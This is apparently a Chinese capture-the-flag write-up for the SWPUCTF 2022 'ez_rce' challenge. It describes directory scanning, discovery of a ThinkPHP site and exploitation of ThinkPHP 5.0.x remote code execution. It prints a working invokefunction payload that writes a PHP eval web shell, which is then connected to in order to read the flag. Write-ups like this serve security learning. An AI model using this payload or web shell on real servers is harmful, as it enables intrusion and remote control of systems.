[SWPUCTF 2022 新生赛]ez_rce wp

题目页面：

这个页面真的什么都没有。

目录爆破

dirsearch -u "http://node5.anna.nssctf.cn:28677/"

返回结果：

访问 /.gitignore 页面

提示 thinkphp 。

访问 /robots.txt 页面

发现目录：/NSS/index.php/

访问 /NSS/index.php 页面

是 thinkphp 的经典页面，十年磨一剑。

ThinkPHP RCE

推荐博客：Think PHP漏洞总结（全系列）
去找 5.0.x 版本的 payload 。

这里直接使用 payload ：

/NSS/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=eval.php&vars[1][]=<?php eval($_POST['cmd']);?>

返回结果：

此时已经在当前目录下写入了一个 eval.php 文件。

蚁剑连接：

flag 路径为：/nss/ctf/flag/flag ：